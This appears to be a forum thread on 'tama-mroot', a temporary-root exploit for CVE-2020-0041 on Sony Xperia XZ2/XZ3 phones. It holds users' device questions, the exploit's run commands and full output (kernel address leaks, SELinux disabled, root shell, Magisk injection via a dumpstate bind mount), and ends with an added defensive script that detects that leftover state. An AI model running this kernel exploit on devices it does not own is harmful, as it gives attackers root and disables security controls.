I am very happy with this root method. But is it possible to have tama-mroot updated to the new version? Because when I tried to update the root myself with the Magisk app, it always broke my phone. The new Magisk root version has Zygisk and I really need it. And I would be very thankful if the tama-mroot could be updated.
CHANGELOG
- 2020-05-14 : released initial version of tama-root (no magisk support, problem with 'Required key not available' returned from some commands)
- 2020-05-22 : finally got magisk from temp root working including permission asking feature - released as tama-mroot.zip
Hi rdhany, can you show me how to replace the firmware list? I am using xz3 softbank.
@j4nn I tried to replace one of the list firmware with my firmware and got results like this
./data/local/tmp/tama-mroot
[+] Detected SO-04K-52.1.B.0.188 target
[+] Mapped 200000
[+] selinux_enforcing before exploit: 1
[+] pipe file: 0xffffffef7242a700
[+] file epitem at ffffffef247c0e80
[+] Reallocating content of 'write8_inode' with controlled data.....[DONE]
[+] Overwriting 0xffffffef7242a720 with 0xffffffef247c0ed0...[DONE]
[+] Write done, should have arbitrary read now.
[+] file operations: ffffff8e8801ebf8
[+] kernel base: ffffff8e86e80000
[+] Reallocating content of 'write8_selinux' with controlled data.[DONE]
[+] Overwriting 0xffffff8e89290000 with 0x0...[DONE]
[+] init_cred: ffffff8e8902fcd0
[+] memstart_addr: 0x752f544e41495241
[+] First level entry: ee122003 -> next table at fffffff2acc8cdbf
Then reboots itself, does this have a chance for temproot?
Yes. No harm to system
Hello, can I use magisk modules?
And what buns can you make in your xz2?
No harm to the system on the locked bootloader, thanks.
How to run via terminal to run root? more details? through the pc received No problem.
Hello, you can find this ROM if you are using Xperia Companion. They have an option for repair and you get a ROM after they downloaded it for repairing your device.
Firmware SO-04K-52.1.B.0.188 uses Android 10. But this firmware can only be obtained with an OTA update. I've tried in the same way to add android 9 firmware list to the exploit, which can be downloaded manually, but nothing happens. So I don't think it can be exploited.
just uploaded the fw version you have requested:
Could you upload H8296-52.1.A.0.618 - xperia XZ2 dual and H8296_Customized TW_1313-6119_52.1.A.0.618_R4C.
Hey
I am very happy with this root method. But is it possible to have tama-mroot updated to the new version? Because when I tried to update the root myself with the Magisk app, it always broke my phone. The new Magisk root version has Zygisk and I really need it. And I would be very thankful if the tama-mroot could be updated.
Why don't you just crossflash to target version of xz2c and get temproot.
Hello, I know from someone that version 52.1.B.0.188
sony xz2compact docomo (SO-05K)
can be temprooted.
I already got
boot /kernel, abl, aop, bluetooth a10 version 52.1.B.0.188 (SO-05K).
can someone develop and build an exploit for xz2c ( SO-05K) please help me
No that's not possible
Hi everyone, I need some help here with my XZ3 SOV39 variant. I've downgraded from the latest SOV39 ROM to the global ROM mentioned in the top post using newflasher tool. I've successfully installed the Oneplus launcher into the oem folder and enabled the gesture navigation using the temp root method. However, my phone has lost the VoLTE function in the meantime after flashing the global FW.
So my questions are,
1. What are the steps to upgrade the firmware to the latest version without modifying the oem folder and losing the launcher?
2. Is the availability of VoLTE strictly tied to the OEM version or the firmware version?
3. Is there any way to fix the VoLTE using the temp root method, for example Magisk modules? If not, would VoLTE work again if I flash the latest global firmware with the original Japan OEM partition?
It is only possible for global version
Hello buddy can this tutor using to sony xperia xz3 japan? I'm already with the same android 10 and kernel 4.9
You can try with this app if you have xbl partition backed up from bootloader unlocked device
It's possible to unlock bootloader on xperia xz2 that running temproot? I have xperia xz2 but bootloader unlock allowed is no, another one lg v50 that running temproot can be unlock bootloader with xbl partition
Nope I'm already using temproot for XZ3 AU SOV39 without using rom Global it's ok, maybe at soon I'm make tutorial use for docomo, softbank and au temproot in xda. Btw for volte it's not lose for my country can be used since IMS not registered so I need time for fix this
It is only possible for global version
You have to crossflash to targeted global version fw if you want temproot
And you will lose VoLTE
Glad to know that
Nope I'm already using temproot for XZ3 AU SOV39 without using rom Global it's ok, maybe at soon I'm make tutorial use for docomo, softbank and au temproot in xda. Btw for volte it's not lose for my country can be used since IMS not registered so I need time for fix this
Hmmm someone ppl the last time try open unlock bootloader from backup boot.img from root device but this person get hardbrick and someday this person back again and said the device already unlock bootloader. Idk this possible or not since this person not said the detail how be can possible about that. For XBL partition someone wanna try this. But my problem is sim lock. AU provider give locked for network subset. I need know how be possible open this without s1unlocktool if do.
Glad to know that
Btw is there any possibility to unlock bootloader without s1unlock tool
And how can we boot into edl mode.
it was possible for lg v50 i think by flashing xbl partition backed up from unlocked device
Having non unlockable bootloader device is headache.
I'm gonna never buy sony mobiles again
Hmm it means no chance
Hmmm someone ppl the last time try open unlock bootloader from backup boot.img from root device but this person get hardbrick and someday this person back again and said the device already unlock bootloader. Idk this possible or not since this person not said the detail how be can possible about that. For XBL partition someone wanna try this. But my problem is sim lock. AU provider give locked for network subset. I need know how be possible open this without s1unlocktool if do.
cd /data/local/tmp
unzip tama-mroot.zip
chmod 755 tama-mroot magisk-setup.sh magisk-start.sh
./magisk-setup.sh
cd /data/local/tmp
./tama-mroot
./magisk-start.sh -1
./magisk-start.sh -2
./magisk-start.sh -3
H8216:/ $ cd /data/local/tmp
H8216:/data/local/tmp $ ./tama-mroot
[+] Detected H8216-52.1.A.0.618 target
[+] Mapped 200000
[+] selinux_enforcing before exploit: 1
[+] pipe file: 0xffffffd07822fa00
[+] file epitem at ffffffd102da6d00
[+] Reallocating content of 'write8_inode' with controlled data...............[DONE]
[+] Overwriting 0xffffffd07822fa20 with 0xffffffd102da6d50...[DONE]
[+] Write done, should have arbitrary read now.
[+] file operations: ffffff9dee01ebf8
[+] kernel base: ffffff9dece80000
[+] Reallocating content of 'write8_selinux' with controlled data..[DONE]
[+] Overwriting 0xffffff9def290000 with 0x0...[DONE]
[+] init_cred: ffffff9def02fcd0
[+] memstart_addr: 0xfffffff040000000
[+] First level entry: ae7f6003 -> next table at ffffffd06e7f6000
[+] Second level entry: ae419003 -> next table at ffffffd06e419000
[+] sysctl_table_root = ffffff9def05c710
[+] Reallocating content of 'write8_sysctl' with controlled data.......[DONE]
[+] Overwriting 0xffffffd1316fc268 with 0xffffffd0ba748000...[DONE]
[+] Injected sysctl node!
[+] Node write8_inode, pid 7109, kaddr ffffffd0c1193700
[+] Replaced sendmmsg dangling reference
[+] Replaced sendmmsg dangling reference
[+] Replaced sendmmsg dangling reference
[+] Node write8_selinux, pid 6726, kaddr ffffffd08bfeb400
[+] Replaced sendmmsg dangling reference
[+] Replaced sendmmsg dangling reference
[+] Replaced sendmmsg dangling reference
[+] Node write8_sysctl, pid 6772, kaddr ffffffd0afc0d000
[+] Replaced sendmmsg dangling reference
[+] Replaced sendmmsg dangling reference
[+] Replaced sendmmsg dangling reference
[+] Cleaned up sendmsg threads
[+] epitem.next = ffffffd07822fa20
[+] epitem.prev = ffffffd07822fad8
[+] Launching privileged shell
root_by_cve-2020-0041:/data/local/tmp # ./magisk-start.sh -1
+ FRESH=false
+ '[' -1 '=' --fresh ']'
+ '[' ! -e /data/adb/magisk/busybox ']'
+ ./magiskpolicy --live --magisk 'allow dumpstate * * *'
Load policy from: /sys/fs/selinux/policy
root_by_cve-2020-0041:/data/local/tmp # ./magisk-start.sh -2
+ FRESH=false
+ '[' -2 '=' --fresh ']'
+ '[' ! -e /data/adb/magisk/busybox ']'
+ STAGE=2
+ '[' 2 '=' 2 ']'
+ mount -t tmpfs -o 'mode=755' none /sbin
+ chcon u:object_r:rootfs:s0 /sbin
+ chmod 755 /sbin
+ cp -a magisk/boot_patch.sh /sbin
+ cp -a magisk/magiskboot /sbin
+ cp -a magisk/magiskinit64 /sbin
+ cp -a magisk/busybox /sbin
+ cp -a magisk/util_functions.sh /sbin
+ cd /sbin
+ chmod 755 boot_patch.sh busybox magiskboot magiskinit64 util_functions.sh
+ mkdir r
+ mount -o bind / r
+ cp -a r/sbin/. /sbin
+ umount r
+ rmdir r
+ mv magiskinit64 magiskinit
+ ./magiskinit -x magisk magisk
+ ln -s /sbin/magiskinit /sbin/magiskpolicy
+ ln -s /sbin/magiskinit /sbin/supolicy
+ false
+ chcon -R u:object_r:magisk_file:s0 /data/adb/magisk
+ rm -f magiskboot util_functions.sh boot_patch.sh
+ ln -s /sbin/magisk /sbin/su
+ ln -s /sbin/magisk /sbin/resetprop
+ ln -s /sbin/magisk /sbin/magiskhide
+ mkdir /sbin/.magisk
+ chmod 755 /sbin/.magisk
+ >/sbin/.magisk/config
+ echo 'KEEPVERITY=true'
+ >>/sbin/.magisk/config
+ echo 'KEEPFORCEENCRYPT=true'
+ chmod 000 /sbin/.magisk/config
+ mkdir -p /sbin/.magisk/busybox
+ chmod 755 /sbin/.magisk/busybox
+ mv busybox /sbin/.magisk/busybox
+ mkdir -p /sbin/.magisk/mirror
+ chmod 000 /sbin/.magisk/mirror
+ mkdir -p /sbin/.magisk/block
+ chmod 000 /sbin/.magisk/block
+ mkdir -p /sbin/.magisk/modules
+ chmod 755 /sbin/.magisk/modules
+ mkdir -p /data/adb/modules
+ chmod 755 /data/adb/modules
+ mkdir -p /data/adb/post-fs-data.d
+ chmod 755 /data/adb/post-fs-data.d
+ mkdir -p /data/adb/service.d
+ chmod 755 /data/adb/service.d
+ chcon -R -h u:object_r:rootfs:s0 /sbin/.magisk
+ chcon u:object_r:magisk_file:s0 /sbin/.magisk/busybox/busybox
+ /sbin/magisk --daemon
client: launching new main daemon process
+ pidof magiskd
+ MP=14148
+ '[' -z 14148 ']'
+ >/sbin/.magisk/escalate
+ echo 14148
+ '[' -e /sbin/.magisk/escalate ']'
+ sleep 1
+ '[' -e /sbin/.magisk/escalate ']'
root_by_cve-2020-0041:/data/local/tmp # ./magisk-start.sh -3
+ FRESH=false
+ '[' -3 '=' --fresh ']'
+ '[' ! -e /data/adb/magisk/busybox ']'
+ STAGE=3
+ '[' 3 '=' 2 ']'
+ >/sbin/.magisk/magiskd
+ echo -e '#!/system/bin/sh\n/sbin/magisk --daemon'
+ chmod 755 /sbin/.magisk/magiskd
+ chcon u:object_r:dumpstate_exec:s0 /sbin/.magisk/magiskd
+ getprop init.svc.dumpstate
+ SVC=''
+ timeout=10
+ '[' 10 -gt 0 ']'
+ stop dumpstate
+ killall -9 magiskd
+ stop dumpstate
+ mount -o bind /sbin/.magisk/magiskd /system/bin/dumpstate
+ start dumpstate
+ timeout=10
+ '[' 10 -le 0 ']'
+ pidof magiskd
+ MP=14165
+ '[' -n 14165 ']'
+ break
+ stop dumpstate
+ sleep 1
+ umount /system/bin/dumpstate
+ rm -f /sbin/.magisk/magiskd
+ '[' '' '=' running ']'
+ rm -f /dev/.magisk_unblock
+ /sbin/magisk --post-fs-data
+ timeout=10
+ '[' -e /dev/.magisk_unblock -o 10 -le 0 ']'
+ sleep 1
+ timeout=9
+ '[' -e /dev/.magisk_unblock -o 9 -le 0 ']'
+ /sbin/magisk --service
+ sleep 1
+ /sbin/magisk --boot-complete
+ chmod 751 /sbin
root_by_cve-2020-0041:/data/local/tmp # id
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc),3011(uhid) context=u:r:magisk:s0
root_by_cve-2020-0041:/data/local/tmp # uname -a
Linux localhost 4.9.186-perf+ #1 SMP PREEMPT Fri Jan 17 01:22:05 2020 aarch64
root_by_cve-2020-0041:/data/local/tmp # getenforce
Permissive
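
For anyone auditing a device, the session above leaves observable state: a tmpfs over /sbin, a temporary mount over /system/bin/dumpstate during stage 3, processes in the u:r:magisk:s0 domain, and SELinux reporting Permissive. The following host-side triage script is an added example, not part of the original thread or of the tama-mroot package. The function names, the constructed sample input and the assumed process-listing layout (SELinux label in the first column, process name in the last) are illustrative assumptions.

```shell
#!/bin/sh
# Host-side triage of text collected from a device (for example over adb).
# All sample input is constructed for illustration, not captured from a device.

# /proc/mounts content on stdin; one finding per matching line.
check_mounts() {
    awk '
        $2 == "/sbin" && $3 == "tmpfs" { print "FINDING tmpfs over /sbin (" $4 ")" }
        $2 == "/system/bin/dumpstate"  { print "FINDING mount over dumpstate (" $3 ")" }
    '
}

# $1 = getenforce output; the session above ends in Permissive.
check_enforce() {
    [ "$1" = "Enforcing" ] || echo "FINDING SELinux not enforcing: $1"
}

# Process listing on stdin, assumed layout: SELinux label first, name last.
check_procs() {
    awk '$1 ~ /^u:r:magisk:s0/ || $NF == "magiskd" {
        print "FINDING magisk process " $NF " in " $1
    }'
}

# $1 mounts, $2 getenforce output, $3 process listing; prints the finding count.
count_findings() {
    {
        printf '%s\n' "$1" | check_mounts
        check_enforce "$2"
        printf '%s\n' "$3" | check_procs
    } | grep -c '^FINDING' || true
}

SAMPLE_MOUNTS='/dev/root / ext4 ro,seclabel,relatime 0 0
none /sbin tmpfs rw,seclabel,relatime,mode=755 0 0
none /system/bin/dumpstate tmpfs rw,seclabel,relatime,mode=755 0 0'
SAMPLE_PS='u:r:init:s0 root 1 0 60000 3000 0 0 S init
u:r:magisk:s0 root 14165 1 20000 1500 0 0 S magiskd'
CLEAN_MOUNTS='/dev/root / ext4 ro,seclabel,relatime 0 0
tmpfs /dev tmpfs rw,seclabel,nosuid,relatime,mode=755 0 0'
CLEAN_PS='u:r:init:s0 root 1 0 60000 3000 0 0 S init
u:r:shell:s0 shell 7000 600 9000 2000 0 0 S sh'

echo "rooted sample: $(count_findings "$SAMPLE_MOUNTS" Permissive "$SAMPLE_PS") findings"
echo "clean sample:  $(count_findings "$CLEAN_MOUNTS" Enforcing "$CLEAN_PS") findings"
```

The dumpstate mount is removed again at the end of stage 3 in the trace, so on a live device the /sbin tmpfs, the magisk domain and the enforcement state are the checks most likely to fire.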